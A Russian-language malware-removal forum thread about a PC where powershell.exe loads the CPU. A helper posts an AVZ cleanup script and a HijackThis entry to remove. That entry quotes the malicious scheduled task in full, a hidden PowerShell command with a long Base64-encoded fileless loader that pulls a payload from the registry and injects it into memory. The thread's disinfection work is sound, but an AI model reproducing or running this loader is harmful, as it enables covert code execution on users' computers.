|
|
|
|
| Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » Загрузка ЦП (более 25%) процессом powershell.exe |
|
|
Загрузка ЦП (более 25%) процессом powershell.exe
|
|
Новый участник Сообщения: 3 |
powershell.exe загружает ЦП, самостоятельные попытки излечить от проказы оказались тщетны. Прошу помощи, выкладываю логи..
|
|
|
Отправлено: 20:22, 20-02-2018 |
Ветеран Сообщения: 765
|
Профиль | Сайт | Отправить PM | Цитировать Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
Выполните скрипт в АВЗ (Файл - Выполнить скрипт): Код:
 begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
QuarantineFile('C:\Windows\TEMP\36fc9e6.sys','');
DeleteFile('C:\Windows\TEMP\36fc9e6.sys','32');
ExecuteFile('schtasks.exe', '/delete /TN "34d46df8-a1de-5a13-bdaab4e94a1082f7" /F', 0, 15000, true);
BC_Activate;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.
Код:
begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end. Полученный архив отправьте при помощи этой формы "Пофиксите" в HijackThis (некоторые строки могут отсутствовать): Код:
O22 - Task: 34d46df8-a1de-5a13-bdaab4e94a1082f7 - C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -NonInteractive -WindowStyle Hidden -EncodedCommand JABOAEYAZQAxAGYARgBJAEoAIAA9ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABTAGgAZQBsAGwAIgA7ACQAYgB2AHAAbwBWADQAdgBFAEMAIAA9ACAAIgB7AEUAMQAwADMAQQA3ADUAQQAtAEUARAA1AEQALQA1ADkANQA2AC0AQwA5AEIARgA4AEEANAA3AEMANwBFAEEAMAA2ADYAMAB9ACIAOwBmAHUAbgBjAHQAaQBvAG4AIABiAEEAcABRAG4AUgBZADUARABqAHsAUABhAHIAYQBtACgAWwBPAHUAdABwAHUAdABUAHkAcABlACgAWwBUAHkAcABlAF0AKQBdAFsAUABhAHIAYQBtAGUAdABlAHIAKAAgAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAwACkAXQBbAFQAeQBwAGUAWwBdAF0AJABYAHoAWQB2AEkAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAVAB5AHAAZQBbAF0AKAAwACkAKQAsAFsAUABhAHIAYQBtAGUAdABlAHIAKAAgAFAAbwBzAGkAdABpAG8AbgAgAD0AIAAxACAAKQBdAFsAVAB5AHAAZQBdACQAaABlAEsATwAyAGIAIAA9ACAAWwBWAG8AaQBkAF0AKQAkAFcAdwB4AG4AMgBuAGwAIAA9ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuADsAJABYAHIANAA3AE8AUwBaAFcAbABPACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAoACcAUgBlAGYAbABlAGMAdABlAGQARABlAGwAZQBnAGEAdABlACcAKQA7ACQASgBxAEUAeABZAEwAVgBvAEsAIAA9ACAAJABXAHcAeABuADIAbgBsAC4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBBAHMAcwBlAG0AYgBsAHkAKAAkAFgAcgA0ADcATwBTAFoAVwBsAE8ALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4ARQBtAGkAdAAuAEEAcwBzAGUAbQBiAGwAeQBCAHUAaQBsAGQAZQByAEEAYwBjAGUAcwBzAF0AOgA6AFIAdQBuACkAOwAkAEoAeABJAGYAZwAgAD0AIAAkAEoAcQBFAHgAWQBMAFYAbwBLAC4ARABlAGYAaQBuAGUARAB5AG4AYQBtAGkAYwBNAG8AZAB1AGwAZQAoACcASQBuAE0AZQBtAG8AcgB5AE0AbwBkAHUAbABlACcALAAgACQAZgBhAGwAcwBlACkAOwAkAEwAMwA3AEIAZwBnAGsAZwAgAD0AIAAkAEoAeABJAGYAZwAuAEQAZQBmAGkAbgBlAFQAeQBwAGUAKAAnAE0AeQBEAGUAbABlAGcAYQB0AGUAVAB5AHAAZQAnACwAIAAnAEMAbABhAHMAcwAsACAAUAB1AGIAbABpAGMALAAgAFMAZQBhAGwAZQBkACwAIABBAG4AcwBpAEMAbABhAHMAcwAsACAAQQB1AHQAbwBDAGwAYQBzAHMAJwAsACAAWwBTAHkAcwB0AGUAbQAuAE0AdQBsAHQAaQBjAGEAcwB0AEQAZQBsAGUAZwBhAHQAZQBdACkAOwAkAEwAUABrAHMAOQAgAD0AIAAkAEwAMwA3AEIAZwBnAGsAZwAuAEQAZQBmAGkAbgBlAEMAbwBuAHMAdAByAHUAYwB0AG8AcgAoACcAUgBUAFMAcABlAGMAaQBhAGwATgBhAG0AZQAsACAASABpAGQAZQBCAHkAUwBpAGcALAAgAFAAdQBiAGwAaQBjACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQwBhAGwAbABpAG4AZwBDAG8AbgB2AGUAbgB0AGkAbwBuAHMAXQA6ADoAUwB0AGEAbgBkAGEAcgBkACwAIAAkAFgAegBZAHYASQApADsAJABMAFAAawBzADkALgBTAGUAdABJAG0AcABsAGUAbQBlAG4AdABhAHQAaQBvAG4ARgBsAGEAZwBzACgAJwBSAHUAbgB0AGkAbQBlACwAIABNAGEAbgBhAGcAZQBkACcAKQA7ACQAeAA0AHUAZwByAEcAZwBUADcAIAA9ACAAJABMADMANwBCAGcAZwBrAGcALgBEAGUAZgBpAG4AZQBNAGUAdABoAG8AZAAoACcASQBuAHYAbwBrAGUAJwAsACAAJwBQAHUAYgBsAGkAYwAsACAASABpAGQAZQBCAHkAUwBpAGcALAAgAE4AZQB3AFMAbABvAHQALAAgAFYAaQByAHQAdQBhAGwAJwAsACAAJABoAGUASwBPADIAYgAsACAAJABYAHoAWQB2AEkAKQA7ACQAeAA0AHUAZwByAEcAZwBUADcALgBTAGUAdABJAG0AcABsAGUAbQBlAG4AdABhAHQAaQBvAG4ARgBsAGEAZwBzACgAJwBSAHUAbgB0AGkAbQBlACwAIABNAGEAbgBhAGcAZQBkACcAKQA7AFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJABMADMANwBCAGcAZwBrAGcALgBDAHIAZQBhAHQAZQBUAHkAcABlACgAKQA7AH0AZgB1AG4AYwB0AGkAbwBuACAAdwBIADgAaAB5AFcAVAB3AEoAKAAkAGMAUAAxAGIAVQBmAHMAaAAsACAAJABMAEYATgAzAFAAZgBVAHcAZQApACAAewAkAHcAUQBNAFYANQBOAGoAOQBIAGIAUwBOAG0AYwA0ADEAbQAgACAAPQAgACQAYwBQADEAYgBVAGYAcwBoAFsAJABMAEYATgAzAFAAZgBVAHcAZQArADAAXQAgACoAIAAxADYANwA3ADcAMgAxADYAOwAkAHcAUQBNAFYANQBOAGoAOQBIAGIAUwBOAG0AYwA0ADEAbQAgACsAPQAgACQAYwBQADEAYgBVAGYAcwBoAFsAJABMAEYATgAzAFAAZgBVAHcAZQArADEAXQAgACoAIAA2ADUANQAzADYAOwAkAHcAUQBNAFYANQBOAGoAOQBIAGIAUwBOAG0AYwA0ADEAbQAgACsAPQAgACQAYwBQADEAYgBVAGYAcwBoAFsAJABMAEYATgAzAFAAZgBVAHcAZQArADIAXQAgACoAIAAyADUANgA7ACQAdwBRAE0AVgA1AE4AagA5AEgAYgBTAE4AbQBjADQAMQBtACAAKwA9ACAAJABjAFAAMQBiAFUAZgBzAGgAWwAkAEwARgBOADMAUABmAFUAdwBlACsAMwBdACAAKgAgADEAOwByAGUAdAB1AHIAbgAgACQAdwBRAE0AVgA1AE4AagA5AEgAYgBTAE4AbQBjADQAMQBtADsAfQAkAHMAbABJAFYANQA1AGQAOQBUAGcAIAA9ACAAQAAiAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAYgBvAG8AbAAgAFcAcgBpAHQAZQBQAHIAbwBjAGUAcwBzAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABwAHIAbwBjAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGEAZABkAHIAZQBzAHMALAAgAGIAeQB0AGUAWwBdACAAYgB1AGYAZgBlAHIALAAgAHUAaQBuAHQAIABzAGkAegBlACwAIAB1AGkAbgB0ACAAdwByAGkAdAB0AGUAbgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFMAZQB0AEUAcgByAG8AcgBNAG8AZABlACgAdQBpAG4AdAAgAHUATQBvAGQAZQApADsACgAiAEAACgAkAHcAUQBNAFYANQBOAGoAOQBIAGIAegBRAGQASABoAGkAVwBGACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcwBsAEkAVgA1ADUAZAA5AFQAZwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBmAHUAbgBjAHQAaQBvAG4AIAB3AGQATwBZAGsAKAAkAHMAbABJAFYANQA1AGQAOQBUAGcALAAgACQATQBDAHQAYQAzAGoAbQAsACAAJABIAGgAZwBsAFMATQA2ACkAIAB7ACQAYQA0AFUARAA0AHMARQAyAE8AUwAgAD0AIAAkAHcAUQBNAFYANQBOAGoAOQBIAGIAegBRAGQASABoAGkAVwBGADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApADsAJABPAGoASgBtAHkAaABnAFQAawAgAD0AIAAkAHcAUQBNAFYANQBOAGoAOQBIAGIAegBRAGQASABoAGkAVwBGADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAkAHMAbABJAFYANQA1AGQAOQBUAGcALgBMAGUAbgBnAHQAaAAsADAAeAAwADAAMAAwADMAMAAwADAALAAwAHgANAAwACkAOwAkAHUAegBtAGwAeQBQACAAPQAgACQAdwBRAE0AVgA1AE4AagA5AEgAYgB6AFEAZABIAGgAaQBXAEYAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQASABoAGcAbABTAE0ANgAuAEwAZQBuAGcAdABoACwAMAB4ADAAMAAwADAAMwAwADAAMAAsADAAeAA0ADAAKQA7ACQAdwBRAE0AVgA1AE4AagA5AEgAYgB6AFEAZABIAGgAaQBXAEYAOgA6AFcAcgBpAHQAZQBQAHIAbwBjAGUAcwBzAE0AZQBtAG8AcgB5ACgAJABhADQAVQBEADQAcwBFADIATwBTACwAIAAkAE8AagBKAG0AeQBoAGcAVABrACwAIAAkAHMAbABJAFYANQA1AGQAOQBUAGcALAAgACQAcwBsAEkAVgA1ADUAZAA5AFQAZwAuAEwAZQBuAGcAdABoACwAIAAwACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAJAB3AFEATQBWADUATgBqADkASABiAHoAUQBkAEgAaABpAFcARgA6ADoAVwByAGkAdABlAFAAcgBvAGMAZQBzAHMATQBlAG0AbwByAHkAKAAkAGEANABVAEQANABzAEUAMgBPAFMALAAgACQAdQB6AG0AbAB5AFAALAAgACQASABoAGcAbABTAE0ANgAsACAAJABIAGgAZwBsAFMATQA2AC4ATABlAG4AZwB0AGgALAAgADAAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAkAHUAZgBEAFkASwAyAEoAZgB3ACAAPQAgAFsASQBuAHQAUAB0AHIAXQAoACQATwBqAEoAbQB5AGgAZwBUAGsALgBUAG8ASQBuAHQANgA0ACgAKQArACQATQBDAHQAYQAzAGoAbQApADsAJABuAE4AQwBMADcAVwBiACAAPQAgAGIAQQBwAFEAbgBSAFkANQBEAGoAIABAACgAWwBJAG4AdABQAHQAcgBdACwAIABbAEkAbgB0AFAAdAByAF0AKQAgACgAWwBWAG8AaQBkAF0AKQA7ACQAawBBAGoARABuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEcAZQB0AEQAZQBsAGUAZwBhAHQAZQBGAG8AcgBGAHUAbgBjAHQAaQBvAG4AUABvAGkAbgB0AGUAcgAoACQAdQBmAEQAWQBLADIASgBmAHcALAAgACQAbgBOAEMATAA3AFcAYgApADsAJAB3AFEATQBWADUATgBqADkASABiAHoAUQBkAEgAaABpAFcARgA6ADoAUwBlAHQARQByAHIAbwByAE0AbwBkAGUAKAAwAHgAOAAwADAANgApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7ACQAawBBAGoARABuAC4ASQBuAHYAbwBrAGUAKAAkAHUAegBtAGwAeQBQACwAIAAkAE8AagBKAG0AeQBoAGcAVABrACkAOwB9AGYAdQBuAGMAdABpAG8AbgAgAFkAWgBUAHkAawAoACQAQQA4AG0AeABuAHUAagBDACwAIAAkAFAAZQBNAG8AYQBlADUAZgAzACkAIAB7ACQAYwA4AEIASQBPADIAIAA9ACAAdwBIADgAaAB5AFcAVAB3AEoAIAAkAEEAOABtAHgAbgB1AGoAQwAgADEAOwAkAHcAUQBNAFYANQBOAGoAOQBIAGIAIAA9ACAANQA7AHcAaABpAGwAZQAgACgAJAB3AFEATQBWADUATgBqADkASABiACsAOAAgAC0AbAB0ACAAJABjADgAQgBJAE8AMgApACAAewAkAEMAeAAyAGwAQQBvAGUAIAA9ACAAJABBADgAbQB4AG4AdQBqAEMAWwAkAHcAUQBNAFYANQBOAGoAOQBIAGIAXQA7ACQARABxADcAQgBsAGEARQBEAEQAcwAgAD0AIAB3AEgAOABoAHkAVwBUAHcASgAgACQAQQA4AG0AeABuAHUAagBDACAAKAAkAHcAUQBNAFYANQBOAGoAOQBIAGIAKwAxACkAOwAkAHEAZQBuAGoAMgA5AEEARQBFACAAPQAgAHcASAA4AGgAeQBXAFQAdwBKACAAJABBADgAbQB4AG4AdQBqAEMAIAAoACQAdwBRAE0AVgA1AE4AagA5AEgAYgArADUAKQA7ACQAdwBRAE0AVgA1AE4AagA5AEgAYgAgACsAPQAgADkAOwBpAGYAIAAoACQAQwB4ADIAbABBAG8AZQAgAC0AZQBxACAAJABQAGUATQBvAGEAZQA1AGYAMwApACAAewB3AGQATwBZAGsAIAAkAEEAOABtAHgAbgB1AGoAQwBbACQAdwBRAE0AVgA1AE4AagA5AEgAYgAuAC4AKAAkAHcAUQBNAFYANQBOAGoAOQBIAGIAKwAkAEQAcQA3AEIAbABhAEUARABEAHMAKQBdACAAJABxAGUAbgBqADIAOQBBAEUARQAgACQAQQA4AG0AeABuAHUAagBDADsAYgByAGUAYQBrADsAfQAgAGUAbABzAGUAIAB7ACQAdwBRAE0AVgA1AE4AagA5AEgAYgAgACsAPQAgACQARABxADcAQgBsAGEARQBEAEQAcwA7AH0AfQB9ACQAaABTAGkAVQBMAE4ARQBqAEUARAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQATgBGAGUAMQBmAEYASQBKACIAIAAtAE4AYQBtAGUAIAAiACQAYgB2AHAAbwBWADQAdgBFAEMAIgApAC4AJABiAHYAcABvAFYANAB2AEUAQwA7ACQAQQA4AG0AeABuAHUAagBDACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAUwBpAFUATABOAEUAagBFAEQAKQA7ACQAQQA4AG0AeABuAHUAagBDAFsAMABdACAAPQAgADAAOwBpAGYAIAAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApACAAewBZAFoAVAB5AGsAIAAkAEEAOABtAHgAbgB1AGoAQwAgADIAOwB9ACAAZQBsAHMAZQAgAHsAWQBaAFQAeQBrACAAJABBADgAbQB4AG4AdQBqAEMAIAAxADsAfQAKAA== |
|
------- Отправлено: 20:33, 20-02-2018 | #2 |
|
Новый участник Сообщения: 3
|
Профиль | Сайт | Отправить PM | Цитировать akok, архив отправлен, строка в хайджеке отсутствует
|
|
Последний раз редактировалось barkalovv@vk, 20-02-2018 в 21:10. Отправлено: 21:04, 20-02-2018 | #3 |
|
Новый участник Сообщения: 3
|
Профиль | Сайт | Отправить PM | Цитировать Повторная диагностика
|
|
Отправлено: 21:10, 20-02-2018 | #4 |
|
Ветеран Сообщения: 765
|
Профиль | Сайт | Отправить PM | Цитировать Что с проблемами?
|
|
|
------- Отправлено: 22:22, 20-02-2018 | #5 |
|
Участник сейчас на форуме |
 |
Участник вне форума |
 |
Автор темы |
 |
Сообщение прикреплено |
| |||||
| Название темы | Автор | Информация о форуме | Ответов | Последнее сообщение | |
| Загрузка powershell на 25-50% ЦП. | FrostDamage | Лечение систем от вредоносных программ | 5 | 21-02-2018 17:43 | |
| Разное - [решено] Загрузка ЦП процессом spoolsv.exe | Infinity7 | Microsoft Windows 2000/XP | 23 | 21-09-2017 14:08 | |
| Службы - [решено] Загрузка ЦП процессом system | Sergooo124rus | Microsoft Windows 10 | 5 | 29-06-2017 13:25 | |
| Загрузка процессора процессом mssdmn.exe | Delirium | Microsoft Windows NT/2000/2003 | 3 | 09-09-2008 09:14 | |
| Загрузка ЦП процессом HelpSvc.exe | miikki | Microsoft Windows 2000/XP | 2 | 22-12-2006 11:54 | |
|
|
Время: 20:59. | © OSzone.net 2001-
|
|
Powered by: vBulletin Copyright ©2000 - 2025, Jelsoft Enterprises Ltd. |
